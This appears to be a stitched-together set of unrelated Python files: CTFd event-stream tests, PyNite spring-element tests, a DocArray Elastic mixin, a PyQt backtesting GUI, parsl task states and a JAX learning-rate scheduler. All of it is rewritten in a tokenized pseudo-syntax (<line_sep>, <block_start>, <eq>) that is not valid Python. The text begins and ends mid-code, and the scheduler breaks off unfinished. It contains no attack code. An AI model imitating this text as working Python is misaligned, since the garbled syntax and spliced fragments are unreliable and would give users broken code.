"data":saved_data}<line_sep>fake_queue.return_value=saved_event<line_sep>event_manager=EventManager()<line_sep>events=event_manager.subscribe()<line_sep>message=next(events)<assert_stmt>isinstance(message ServerSentEvent)<assert_stmt>message.to_dict()<eq>{"data":"" "type":"ping"}<assert_stmt>message.__str__().startswith("event:ping")<assert_stmt>len(event_manager.clients)<eq>1<line_sep>message=next(events)<assert_stmt>isinstance(message ServerSentEvent)<assert_stmt>message.to_dict()<eq>saved_event<assert_stmt>message.__str__().startswith("event:notification\ndata:")<assert_stmt>len(event_manager.clients)<eq>1<block_end><block_end><def_stmt>test_event_manager_publish <block_start>"""Test that EventManager publishing to clients works"""<line_sep>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 
}<line_sep>event_manager=EventManager()<line_sep>q=defaultdict(Queue)<line_sep>event_manager.clients[id(q)]=q<line_sep>event_manager.publish(data=saved_data type="notification" channel="ctf")<line_sep>event=event_manager.clients[id(q)]["ctf"].get()<line_sep>event=ServerSentEvent(**event)<assert_stmt>event.data<eq>saved_data<block_end><def_stmt>test_event_endpoint_is_event_stream <block_start>"""Test that the /events endpoint is text/event-stream"""<line_sep>app=create_ctfd()<with_stmt>patch.object(Queue "get")<as>fake_queue<block_start>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 }<line_sep>saved_event={"type":"notification" "data":saved_data}<line_sep>fake_queue.return_value=saved_event<with_stmt>app.app_context()<block_start>register_user(app)<with_stmt>login_as_user(app)<as>client<block_start>r=client.get("/events")<assert_stmt>"text/event-stream"<in>r.headers["Content-Type"]<block_end><block_end><block_end>destroy_ctfd(app)<block_end><def_stmt>test_redis_event_manager_installed <block_start>"""Test that RedisEventManager is installed on the Flask app"""<class_stmt>RedisConfig(TestingConfig)<block_start>REDIS_URL="redis://localhost:6379/1"<line_sep>CACHE_REDIS_URL="redis://localhost:6379/1"<line_sep>CACHE_TYPE="redis"<block_end><try_stmt><block_start>app=create_ctfd(config=RedisConfig)<block_end><except_stmt>ConnectionError<block_start>print("Failed to connect to redis. 
Skipping test.")<block_end><else_stmt><block_start><with_stmt>app.app_context()<block_start><assert_stmt>isinstance(app.events_manager RedisEventManager)<block_end>destroy_ctfd(app)<block_end><block_end><def_stmt>test_redis_event_manager_subscription <block_start>"""Test that RedisEventManager subscribing works."""<class_stmt>RedisConfig(TestingConfig)<block_start>REDIS_URL="redis://localhost:6379/2"<line_sep>CACHE_REDIS_URL="redis://localhost:6379/2"<line_sep>CACHE_TYPE="redis"<block_end><try_stmt><block_start>app=create_ctfd(config=RedisConfig)<block_end><except_stmt>ConnectionError<block_start>print("Failed to connect to redis. Skipping test.")<block_end><else_stmt><block_start><with_stmt>app.app_context()<block_start>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 }<line_sep>saved_event={"type":"notification" "data":saved_data}<with_stmt>patch.object(Queue "get")<as>fake_queue<block_start>fake_queue.return_value=saved_event<line_sep>event_manager=RedisEventManager()<line_sep>events=event_manager.subscribe()<line_sep>message=next(events)<assert_stmt>isinstance(message ServerSentEvent)<assert_stmt>message.to_dict()<eq>{"data":"" "type":"ping"}<assert_stmt>message.__str__().startswith("event:ping")<line_sep>message=next(events)<assert_stmt>isinstance(message ServerSentEvent)<assert_stmt>message.to_dict()<eq>saved_event<assert_stmt>message.__str__().startswith("event:notification\ndata:")<block_end><block_end>destroy_ctfd(app)<block_end><block_end><def_stmt>test_redis_event_manager_publish <block_start>"""Test that RedisEventManager publishing to clients works."""<class_stmt>RedisConfig(TestingConfig)<block_start>REDIS_URL="redis://localhost:6379/3"<line_sep>CACHE_REDIS_URL="redis://localhost:6379/3"<line_sep>CACHE_TYPE="redis"<block_end><try_stmt><block_start>app=create_ctfd(config=RedisConfig)<block_end><except_stmt>ConnectionError<block_start>print("Failed 
to connect to redis. Skipping test.")<block_end><else_stmt><block_start><with_stmt>app.app_context()<block_start>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 }<line_sep>event_manager=RedisEventManager()<line_sep>event_manager.publish(data=saved_data type="notification" channel="ctf")<block_end>destroy_ctfd(app)<block_end><block_end><def_stmt>test_redis_event_manager_listen <block_start>"""Test that RedisEventManager listening pubsub works."""<line_sep># This test is nob currently working properly
# This test is sort of incomplete b/c we aren't also subscribing
# I wasnt able to get listening and subscribing to work at the same time
# But the code does work under gunicorn and serve.py
<try_stmt># import importlib
# from gevent.monkey import patch_time, patch_socket
# from gevent import Timeout
# patch_time()
# patch_socket()
<block_start><class_stmt>RedisConfig(TestingConfig)<block_start>REDIS_URL="redis://localhost:6379/4"<line_sep>CACHE_REDIS_URL="redis://localhost:6379/4"<line_sep>CACHE_TYPE="redis"<block_end><try_stmt><block_start>app=create_ctfd(config=RedisConfig)<block_end><except_stmt>ConnectionError<block_start>print("Failed to connect to redis. Skipping test.")<block_end><else_stmt><block_start><with_stmt>app.app_context()# saved_event = {
# "data": {
# "team_id": None,
# "user_id": None,
# "content": "asdf",
# "title": "asdf",
# "id": 1,
# "team": None,
# "user": None,
# "date": "2020-08-31T23:57:27.193081+00:00",
# "type": "toast",
# "sound": None,
# },
# "type": "notification",
# }
<block_start>event_manager=RedisEventManager()<line_sep># def disable_retry(f, *args, **kwargs):
# return f()
# with patch("tenacity.retry", side_effect=disable_retry):
# with Timeout(10):
# event_manager.listen()
event_manager.listen()<line_sep># event_manager.publish(
# data=saved_event["data"], type="notification", channel="ctf"
# )
<block_end>destroy_ctfd(app)<block_end><block_end><finally_stmt><block_start><pass><line_sep># import socket
# import time
# importlib.reload(socket)
# importlib.reload(time)
<block_end><block_end> |
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 <NAME>, SE; tamalone1
"""<import_stmt>unittest<import_from_stmt>PyNite FEModel3D<import_stmt>sys<import_from_stmt>io StringIO<class_stmt>Test_Spring_Elements(unittest.TestCase)<block_start>''' Tests of spring members.'''<def_stmt>setUp self# Suppress printed output temporarily
<block_start>sys.stdout=StringIO()<block_end><def_stmt>tearDown self# Reset the print function to normal
<block_start>sys.stdout=sys.__stdout__<block_end><def_stmt>test_spring_elements self# A First Course in the Finite Element Method, 4th Edition
# <NAME>
# Example 2.1
# Units for this model are pounds and inches
<block_start>system=FEModel3D()<line_sep>system.add_node('1' 0 0 0)<line_sep>system.add_node('2' 30 0 0)<line_sep>system.add_node('3' 10 0 0)<line_sep>system.add_node('4' 20 0 0)<line_sep># Add spring members
system.add_spring('S1' '1' '3' 1000)<line_sep>system.add_spring('S2' '3' '4' 2000)<line_sep>system.add_spring('S3' '4' '2' 3000)<line_sep># Define supports
system.def_support('1' <true> <true> <true> <true> <true> <true>)<line_sep>system.def_support('2' <true> <true> <true> <true> <true> <true>)<line_sep>system.def_support('3' <false> <true> <true> <true> <true> <true>)<line_sep>system.def_support('4' <false> <true> <true> <true> <true> <true>)<line_sep># Add node loads
system.add_node_load('4' 'FX' 5000)<line_sep>system.analyze(<true>)<line_sep># Check results
# correct_values = [('3', 0.9090909090909092),
# ('4', 1.3636363636363638),
# ('1', -909.0909090909091),
# ('2', -4090.9090909090914)]
n3_DX=system.Nodes['3'].DX['Combo 1']<line_sep>self.assertAlmostEqual(n3_DX/0.9090909090909092 1.0 2)<line_sep>n4_DX=system.Nodes['4'].DX['Combo 1']<line_sep>self.assertAlmostEqual(n4_DX/1.3636363636363638 1.0 2)<line_sep>n1_rxn=system.Nodes['1'].RxnFX['Combo 1']<line_sep>self.assertAlmostEqual(n1_rxn/-909.0909090909091 1.0 2)<line_sep>n2_rxn=system.Nodes['2'].RxnFX['Combo 1']<line_sep>self.assertAlmostEqual(n2_rxn/-4090.9090909090914 1.0 2)<block_end><block_end> |
<import_from_stmt>typing Union Iterable Dict<import_from_stmt>..base.seqlike BaseSequenceLikeMixin<import_from_stmt>.... Document<class_stmt>SequenceLikeMixin(BaseSequenceLikeMixin)<block_start>"""Implement sequence-like methods for DocumentArray with Elastic as storage"""<def_stmt>__eq__ self other<block_start>"""Compare this object to the other, returns True if and only if other
as the same type as self and other has the same meta information
:param other: the other object to check for equality
:return: ``True`` if other is equal to self
"""<line_sep># two DAW are considered as the same if they have the same client meta data
<return>(type(self)<is>type(other)<and>self._client.get_meta()<eq>other._client.get_meta()<and>self._config<eq>other._config)<block_end><def_stmt>__len__ self<block_start>"""Return the length of :class:`DocumentArray` that uses Elastic as storage
:return: the length of this :class:`DocumentArrayElastic` object
"""<try_stmt><block_start><return>self._client.count(index=self._config.index_name)["count"]<block_end><except_stmt><block_start><return>0<block_end><block_end><def_stmt>__contains__ self x:Union[str 'Document']<block_start>"""Check if ``x`` is contained in this :class:`DocumentArray` with Elastic storage
:param x: the id of the document to check or the document object itself
:return: True if ``x`` is contained in self
"""<if_stmt>isinstance(x str)<block_start><return>self._doc_id_exists(x)<block_end><elif_stmt>isinstance(x Document)<block_start><return>self._doc_id_exists(x.id)<block_end><else_stmt><block_start><return><false><block_end><block_end><def_stmt>__del__ self<block_start>"""Delete this :class:`DocumentArrayElastic` object"""<line_sep>self._save_offset2ids()<line_sep># if not self._persist:
# self._offset2ids.clear()
<block_end><def_stmt>__repr__ self<block_start>"""Return the string representation of :class:`DocumentArrayElastic` object
:return: string representation of this object
"""<line_sep><return>f'<{self.__class__.__name__} (length={len(self)}) at {id(self)}>'<block_end><def_stmt>_upload_batch self docs:Iterable['Document']<block_start>batch=[]<for_stmt>doc docs<block_start>batch.append(self._document_to_elastic(doc))<if_stmt>len(batch)<g>self._config.batch_size<block_start>self._send_requests(batch)<line_sep>self._refresh(self._config.index_name)<line_sep>batch=[]<block_end><block_end><if_stmt>len(batch)<g>0<block_start>self._send_requests(batch)<line_sep>self._refresh(self._config.index_name)<block_end><block_end><def_stmt>extend self docs:Iterable['Document']<block_start>docs=list(docs)<line_sep>self._upload_batch(docs)<line_sep>self._offset2ids.extend([doc.id<for>doc docs])<block_end><block_end> |
"""Ui."""<import_stmt>logging<import_stmt>logging.config<import_stmt>os.path<import_from_stmt>datetime datetime<import_from_stmt>PyQt5 QtCore QtGui<import_from_stmt>.lib EquityChart OptimizatimizedResultsTable OptimizationTable Portfolio QuotesChart ResultsTable Settings Symbol TradesTable get_quotes get_symbols strategies_from_file <line_sep>__all__=('MainWidget' )<line_sep>logger=logging.getLogger(__name__)<line_sep>DEFAULT_TICKER='AAPL'<line_sep>SYMBOL_COLUMNS=['Symbol' 'Security Name']<class_stmt>SymbolsLoaderThread(QtCore.QThread)<block_start>symbols_loaded=QtCore.pyqtSignal(object)<def_stmt>run self<block_start>symbols=get_symbols()<line_sep>self.symbols_loaded.emit(symbols[SYMBOL_COLUMNS].values)<block_end><block_end><class_stmt>DataTabWidget(QtGui.QWidget)<block_start>data_updated=QtCore.pyqtSignal(object)<def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.select_source=QtGui.QTabWidget(self)<line_sep>self.select_source.setGeometry(210 50 340 200)<line_sep>self.init_shares_tab_ui()<line_sep>self.init_external_tab_ui()<line_sep>self.symbols_loader=SymbolsLoaderThread()<line_sep>self.symbols_loader.started.connect(self.on_symbols_loading)<line_sep>self.symbols_loader.symbols_loaded.connect(self.on_symbols_loaded QtCore.Qt.QueuedConnection)<line_sep>self.symbols_loader.start()<line_sep>self.date_from=self.shares_date_from.date().toPyDate()<line_sep>self.date_to=self.shares_date_to.date().toPyDate()<block_end><def_stmt>init_external_tab_ui self<block_start>"""External data."""<line_sep>self.external_tab=QtGui.QWidget()<line_sep>self.external_tab.setEnabled(<false>)<line_sep>self.external_layout=QtGui.QVBoxLayout(self.external_tab)<line_sep>self.import_data_name=QtGui.QLabel('Import External 
Data')<line_sep>self.import_data_label=QtGui.QLabel('...')<line_sep>self.import_data_btn=QtGui.QPushButton('Import')<line_sep>self.import_data_btn.clicked.connect(self.open_file)<line_sep>self.external_layout.addWidget(self.import_data_name 0 QtCore.Qt.AlignCenter)<line_sep>self.external_layout.addWidget(self.import_data_label 0 QtCore.Qt.AlignCenter)<line_sep>self.external_layout.addWidget(self.import_data_btn 0 QtCore.Qt.AlignCenter)<line_sep>self.select_source.addTab(self.external_tab 'Custom data')<block_end><def_stmt>init_shares_tab_ui self<block_start>"""Shares."""<line_sep>self.shares_tab=QtGui.QWidget()<line_sep>self.shares_layout=QtGui.QFormLayout(self.shares_tab)<line_sep>today=datetime.today()<line_sep>self.shares_date_from=QtGui.QDateEdit()<line_sep>self.shares_date_from.setMinimumDate(QtCore.QDate(1900 1 1))<line_sep>self.shares_date_from.setMaximumDate(QtCore.QDate(2030 12 31))<line_sep>self.shares_date_from.setDate(QtCore.QDate(today.year 1 1))<line_sep>self.shares_date_from.setDisplayFormat('dd.MM.yyyy')<line_sep>self.shares_date_to=QtGui.QDateEdit()<line_sep>self.shares_date_to.setMinimumDate(QtCore.QDate(1900 1 1))<line_sep>self.shares_date_to.setMaximumDate(QtCore.QDate(2030 12 31))<line_sep>self.shares_date_to.setDate(QtCore.QDate(today.year today.month today.day))<line_sep>self.shares_date_to.setDisplayFormat('dd.MM.yyyy')<line_sep>self.shares_symbol_list=QtGui.QComboBox()<line_sep>self.shares_symbol_list.setFocusPolicy(QtCore.Qt.StrongFocus)<line_sep>self.shares_symbol_list.setMaxVisibleItems(20)<line_sep>self.shares_symbol_list.setEditable(<true>)<line_sep>self.shares_show_btn=QtGui.QPushButton('Load')<line_sep>self.shares_show_btn.clicked.connect(self.update_data)<line_sep>self.shares_layout.addRow('From' self.shares_date_from)<line_sep>self.shares_layout.addRow('To' self.shares_date_to)<line_sep>self.shares_layout.addRow('Symbol' self.shares_symbol_list)<line_sep>self.shares_layout.addRow(<none> 
self.shares_show_btn)<line_sep>self.select_source.addTab(self.shares_tab 'Shares/Futures/ETFs')<block_end><def_stmt>on_symbols_loading self<block_start>self.shares_symbol_list.addItem('Loading...')<line_sep>self.shares_symbol_list.setEnabled(<false>)<block_end><def_stmt>on_symbols_loaded self symbols<block_start>self.shares_symbol_list.clear()<line_sep>self.shares_symbol_list.setEnabled(<true>)<line_sep># self.symbols = ['%s/%s' % (ticker, name) for ticker, name in symbols]
# self.shares_symbol_list.addItems(self.symbols)
model=QtGui.QStandardItemModel()<line_sep>model.setHorizontalHeaderLabels(SYMBOL_COLUMNS)<for_stmt>irow,(ticker name) enumerate(symbols)<block_start>model.setItem(irow 0 QtGui.QStandardItem(ticker))<line_sep>model.setItem(irow 1 QtGui.QStandardItem(name))<block_end>table_view=QtGui.QTableView()<line_sep>table_view.setModel(model)<line_sep>table_view.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)<line_sep>table_view.verticalHeader().setVisible(<false>)<line_sep>table_view.setAutoScroll(<false>)<line_sep>table_view.setShowGrid(<false>)<line_sep>table_view.resizeRowsToContents()<line_sep>table_view.setColumnWidth(0 60)<line_sep>table_view.setColumnWidth(1 240)<line_sep>table_view.setMinimumWidth(300)<line_sep>completer=QtGui.QCompleter(model)<line_sep>completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)<line_sep>completer.setModel(model)<line_sep>self.symbols=symbols<line_sep>self.shares_symbol_list.setModel(model)<line_sep>self.shares_symbol_list.setView(table_view)<line_sep>self.shares_symbol_list.setCompleter(completer)<line_sep># set default symbol
self.shares_symbol_list.setCurrentIndex(self.shares_symbol_list.findText(DEFAULT_TICKER))<block_end><def_stmt>open_file self<block_start>filename=QtGui.QFileDialog.getOpenFileName(parent=<none> caption='Open a source of data' directory=QtCore.QDir.currentPath() filter='All (*);;Text (*.txt)' )<line_sep>self.import_data_label.setText('Loading %s'%filename)<with_stmt>open(filename 'r' encoding='utf-8')<as>f<block_start>self.data=f.readlines()<block_end><block_end><def_stmt>update_data self ticker=<none><block_start>ticker=ticker<or>self.shares_symbol_list.currentText()<line_sep>self.symbol=Symbol(ticker=ticker mode=Symbol.SHARES)<line_sep>self.date_from=self.shares_date_from.date().toPyDate()<line_sep>self.date_to=self.shares_date_to.date().toPyDate()<line_sep>get_quotes(symbol=self.symbol.ticker date_from=self.date_from date_to=self.date_to )<line_sep>self.data_updated.emit(self.symbol)<block_end><block_end><class_stmt>StrategyBoxWidget(QtGui.QGroupBox)<block_start>run_backtest=QtCore.pyqtSignal(object)<def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.setTitle('Strategy')<line_sep>self.setAlignment(QtCore.Qt.AlignCenter)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<line_sep>self.list=QtGui.QComboBox()<line_sep>self.add_btn=QtGui.QPushButton('+')<line_sep>self.add_btn.clicked.connect(self.add_strategies)<line_sep>self.start_btn=QtGui.QPushButton('Start Backtest')<line_sep>self.start_btn.clicked.connect(self.load_strategy)<line_sep>self.layout.addWidget(self.list stretch=2)<line_sep>self.layout.addWidget(self.add_btn stretch=0)<line_sep>self.layout.addWidget(self.start_btn stretch=0)<line_sep>self.load_strategies_from_settings()<block_end><def_stmt>reload_strategies self<block_start>"""Reload user's file to get actual version of the strategies."""<line_sep>self.strategies=strategies_from_file(self.strategies_path)<block_end><def_stmt>reload_list 
self<block_start>self.list.clear()<line_sep>self.list.addItems([s.get_name()<for>s self.strategies])<block_end><def_stmt>load_strategies_from_settings self<block_start>filename=Settings.value('strategies/path' <none>)<if_stmt><not>filename<or><not>os.path.exists(filename)<block_start><return><block_end>self.strategies_path=filename<line_sep>self.reload_strategies()<line_sep>self.reload_list()<block_end><def_stmt>save_strategies_to_settings self<block_start>Settings.setValue('strategies/path' self.strategies_path)<block_end><def_stmt>add_strategies self<block_start>filename,_filter=QtGui.QFileDialog.getOpenFileName(self caption='Open Strategy.' directory=QtCore.QDir.currentPath() filter='Python modules (*.py)' )<if_stmt><not>filename<block_start><return><block_end>self.strategies_path=filename<line_sep>self.save_strategies_to_settings()<line_sep>self.reload_strategies()<line_sep>self.reload_list()<block_end><def_stmt>load_strategy self<block_start>self.reload_strategies()<line_sep>self.run_backtest.emit(self.strategies[self.list.currentIndex()])<block_end><block_end><class_stmt>QuotesTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QVBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<line_sep>self.toolbar_layout=QtGui.QHBoxLayout()<line_sep>self.toolbar_layout.setContentsMargins(10 10 15 0)<line_sep>self.chart_layout=QtGui.QHBoxLayout()<line_sep>self.init_timeframes_ui()<line_sep>self.init_strategy_ui()<line_sep>self.layout.addLayout(self.toolbar_layout)<line_sep>self.layout.addLayout(self.chart_layout)<block_end><def_stmt>init_timeframes_ui self<block_start>self.tf_layout=QtGui.QHBoxLayout()<line_sep>self.tf_layout.setSpacing(0)<line_sep>self.tf_layout.setContentsMargins(0 12 0 0)<line_sep>time_frames=('1M' '5M' '15M' '30M' '1H' '1D' '1W' 'MN')<line_sep>btn_prefix='TF'<for_stmt>tf time_frames<block_start>btn_name=''.join([btn_prefix 
tf])<line_sep>btn=QtGui.QPushButton(tf)<line_sep># TODO:
btn.setEnabled(<false>)<line_sep>setattr(self btn_name btn)<line_sep>self.tf_layout.addWidget(btn)<block_end>self.toolbar_layout.addLayout(self.tf_layout)<block_end><def_stmt>init_strategy_ui self<block_start>self.strategy_box=StrategyBoxWidget(self)<line_sep>self.toolbar_layout.addWidget(self.strategy_box)<block_end><def_stmt>update_chart self symbol<block_start><if_stmt><not>self.chart_layout.isEmpty()<block_start>self.chart_layout.removeWidget(self.chart)<block_end>self.chart=QuotesChart()<line_sep>self.chart.plot(symbol)<line_sep>self.chart_layout.addWidget(self.chart)<block_end><def_stmt>add_signals self<block_start>self.chart.add_signals()<block_end><block_end><class_stmt>EquityTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<block_end><def_stmt>update_chart self<block_start><if_stmt><not>self.layout.isEmpty()<block_start>self.layout.removeWidget(self.chart)<block_end>self.chart=EquityChart()<line_sep>self.chart.plot()<line_sep>self.layout.addWidget(self.chart)<block_end><block_end><class_stmt>ResultsTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<block_end><def_stmt>update_table self<block_start><if_stmt><not>self.layout.isEmpty()<block_start>self.layout.removeWidget(self.table)<block_end>self.table=ResultsTable()<line_sep>self.table.plot()<line_sep>self.layout.addWidget(self.table)<block_end><block_end><class_stmt>TradesTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<block_end><def_stmt>update_table 
self<block_start><if_stmt><not>self.layout.isEmpty()<block_start>self.layout.removeWidget(self.table)<block_end>self.table=TradesTable()<line_sep>self.table.plot()<line_sep>self.layout.addWidget(self.table)<block_end><block_end><class_stmt>OptimizationTabWidget(QtGui.QWidget)<block_start>optimization_done=QtCore.pyqtSignal()<def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QVBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<line_sep>self.table_layout=QtGui.QHBoxLayout()<line_sep>self.top_layout=QtGui.QHBoxLayout()<line_sep>self.top_layout.setContentsMargins(0 10 0 0)<line_sep>self.start_optimization_btn=QtGui.QPushButton('Start')<line_sep>self.start_optimization_btn.clicked.connect(self.start_optimization)<line_sep>self.top_layout.addWidget(self.start_optimization_btn alignment=QtCore.Qt.AlignRight)<line_sep>self.layout.addLayout(self.top_layout)<line_sep>self.layout.addLayout(self.table_layout)<block_end><def_stmt>update_table self strategy<block_start><if_stmt><not>self.table_layout.isEmpty()# close() to avoid an UI issue with duplication of the table
<block_start>self.table.close()<line_sep>self.table_layout.removeWidget(self.table)<block_end>self.table=OptimizationTable()<line_sep>self.table.plot(strategy)<line_sep>self.table_layout.addWidget(self.table)<block_end><def_stmt>start_optimization self *args **kwargs<block_start>logger.debug('Start optimization')<line_sep>self.table.optimize()<line_sep>self.optimization_done.emit()<line_sep>logger.debug('Optimization is done')<block_end><block_end><class_stmt>OptimizatimizedResultsTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<line_sep>self.table=OptimizatimizedResultsTable()<line_sep>self.table.plot()<line_sep>self.layout.addWidget(self.table)<block_end><block_end><class_stmt>MainWidget(QtGui.QTabWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.setDocumentMode(<true>)<line_sep>self.data_tab=DataTabWidget(self)<line_sep>self.data_tab.data_updated.connect(self._update_quotes_chart)<line_sep>self.addTab(self.data_tab 'Data')<block_end><def_stmt>_add_quotes_tab self<block_start><if_stmt>self.count()<ge>2# quotes tab is already exists
<block_start><return><block_end>self.quotes_tab=QuotesTabWidget(self)<line_sep>self.quotes_tab.strategy_box.run_backtest.connect(self._run_backtest)<line_sep>self.addTab(self.quotes_tab 'Quotes')<block_end><def_stmt>_add_result_tabs self<block_start><if_stmt>self.count()<ge>3# tabs are already exist
<block_start><return><block_end>self.equity_tab=EquityTabWidget(self)<line_sep>self.results_tab=ResultsTabWidget(self)<line_sep>self.trades_tab=TradesTabWidget(self)<line_sep>self.optimization_tab=OptimizationTabWidget(self)<line_sep>self.optimization_tab.optimization_done.connect(self._add_optimized_results)<line_sep># noqa
self.addTab(self.equity_tab 'Equity')<line_sep>self.addTab(self.results_tab 'Results')<line_sep>self.addTab(self.trades_tab 'Trades')<line_sep>self.addTab(self.optimization_tab 'Optimization')<block_end><def_stmt>_update_quotes_chart self symbol<block_start>self._add_quotes_tab()<line_sep>self.symbol=symbol<line_sep>self.quotes_tab.update_chart(self.symbol)<line_sep>self.setCurrentIndex(1)<block_end><def_stmt>_run_backtest self strategy<block_start>logger.debug('Run backtest')<line_sep>Portfolio.clear()<line_sep>stg=strategy(symbols=[self.symbol])<line_sep>stg.run()<line_sep>Portfolio.summarize()<line_sep>self.quotes_tab.add_signals()<line_sep>self._add_result_tabs()<line_sep>self.equity_tab.update_chart()<line_sep>self.results_tab.update_table()<line_sep>self.trades_tab.update_table()<line_sep>self.optimization_tab.update_table(strategy=stg)<line_sep>logger.debug('Count positions in the portfolio: %d' Portfolio.position_count())<block_end><def_stmt>_add_optimized_results self<block_start>self.addTab(OptimizatimizedResultsTabWidget(self) 'Optimized Results')<line_sep>self.setCurrentIndex(self.count()-1)<block_end><def_stmt>plot_test_data self<block_start>logger.debug('Plot test data')<line_sep>self.data_tab.update_data(ticker=DEFAULT_TICKER)<line_sep>self.quotes_tab.strategy_box.load_strategy()<block_end><block_end> |
from enum import IntEnum


class States(IntEnum):
    """States a parsl task may occupy.

    The state lives in the task record kept by a `DataFlowKernel` and is
    mirrored into the monitoring database.

    A task that runs successfully moves through this sequence:

        pending -> launched -> running -> exec_done

    The remaining states capture departures from that path, caused either by
    failures or by deliberate changes to how tasks execute (for example
    join_app, or memoization).

    Every task eventually lands in one of the states in ``FINAL_STATES``.
    """

    unsched = -1
    # Known to parsl but not runnable yet, usually because dependency tasks
    # have not completed.
    pending = 0
    # Executing on a resource.  This state is special: a DFK task record never
    # takes this value; only the monitoring database may report it, based on
    # non-DFK information received from monitor_wrapper.
    running = 2
    # Executed successfully.
    exec_done = 3
    # Failed; no more attempts will be made to run it.
    failed = 4
    # Marked failed without even an attempt to launch, because a dependency
    # of this task failed.
    dep_fail = 5
    # Handed to a `ParslExecutor` for execution.
    launched = 7
    # Failed, but eligible for retry.
    fail_retryable = 8
    # Found in the memoization table; marked done without an attempt to launch.
    memo_done = 9
    # A join_app that has run its own Python code and is now waiting on other
    # tasks before it can reach a done/failed state.
    joining = 10


# Terminal states: once reached, a task never moves to another state, because
# the job has either definitively completed or failed.
FINAL_STATES = [States.exec_done, States.memo_done, States.failed, States.dep_fail]

# Terminal states that indicate failure; must be a subset of FINAL_STATES.
FINAL_FAILURE_STATES = [States.failed, States.dep_fail]
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common code from different mains."""<import_stmt>jax.numpy<as>jnp<import_stmt>numpy<as>np<line_sep>STEPS_PER_EPOCH=4500<def_stmt>create_learning_rate_scheduler factors='constant * linear_warmup * rsqrt_decay' base_learning_rate=0.5 warmup_steps=1000 decay_factor=0.5 steps_per_decay=20000 steps_per_cycle=100000 init_step=0 finetune_lr=<false><block_start>"""Creates learning rate schedule.
Interprets factors in the factors string which can consist of:
* constant: interpreted as the constant value,
* linear_warmup: interpreted as linear warmup until warmup_steps,
* rsqrt_decay: divide by square root of max(step, warmup_steps)
* rsqrt_normalized_decay: divide by square root of max(step/warmup_steps, 1)
* decay_every: Every k steps decay the learning rate by decay_factor.
* cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.
Args:
factors: string, factors separated by "*" that defines the schedule.
base_learning_rate: float, the starting constant for the lr schedule.
warmup_steps: int, how many steps to warm up for in the warmup schedule.
decay_factor: float, the amount to decay the learning rate by.
steps_per_decay: int, how often to decay the learning rate.
steps_per_cycle: int, steps per cycle when using cosine decay.
init_step: int, first step of this run. Used with finetune_lr
finetune_lr: bool, modify step count for finetuning smaller datasets
Returns:
a function learning_rate(step): float -> {"learning_rate": float}, the
step-dependent lr.
"""<line_sep>factors=[n.strip()<for>n factors.split('*')]<def_stmt>step_fn step<block_start>"""Step to learning rate function."""<line_sep>ret=1.0<if_stmt>finetune_lr<block_start>steps_this_run=step-init_step<line_sep>multiplier=STEPS_PER_EPOCH/steps_per_cycle<line_sep>finetune_steps=steps_this_run<times>multiplier<line_sep>step=init_step+finetune_steps<block_end><for_stmt>name factors<block_start><if_stmt>name<eq>'constant'<block_start>ret<augmul>base_learning_rate<block_end><elif_stmt>name<eq>'linear_warmup'<block_start>ret<augmul>jnp.minimum(1.0 step/warmup_steps)<block_end><elif_stmt>name<eq>'rsqrt_decay'<block_start>ret<augdiv>jnp.sqrt(jnp.maximum(step warmup_steps))<block_end><elif_stmt>name<eq>'rsqrt_normalized_decay'<block_start>ret<augmul>jnp.sqrt(warmup_steps)<line_sep>ret<augdiv>jnp.sqrt(jnp.maximum(step warmup_steps))<block_end><elif_stmt>name<eq>'decay_every'<block_start>ret<augmul>(decay_factor<power>(step<floordiv>steps_per_decay))<block_end><elif_stmt>name<eq>'cosine_decay'<block_start>progress=jnp.maximum(0.0 (step-warmup_steps)/float(steps_per_cycle))<line_sep>ret<augmul>jnp.maximum(0.0 0.5<times>(1.0+jnp.cos(jnp.pi<times>(progress%1.0))))<block_end><else_stmt><block_start><raise>ValueError('Unknown factor %s.'%name)<block_end><block_end><return>jnp.asarray(ret dtype=jnp.float32)<block_end><return>step_fn<block_end><def_stmt>pad_examples x 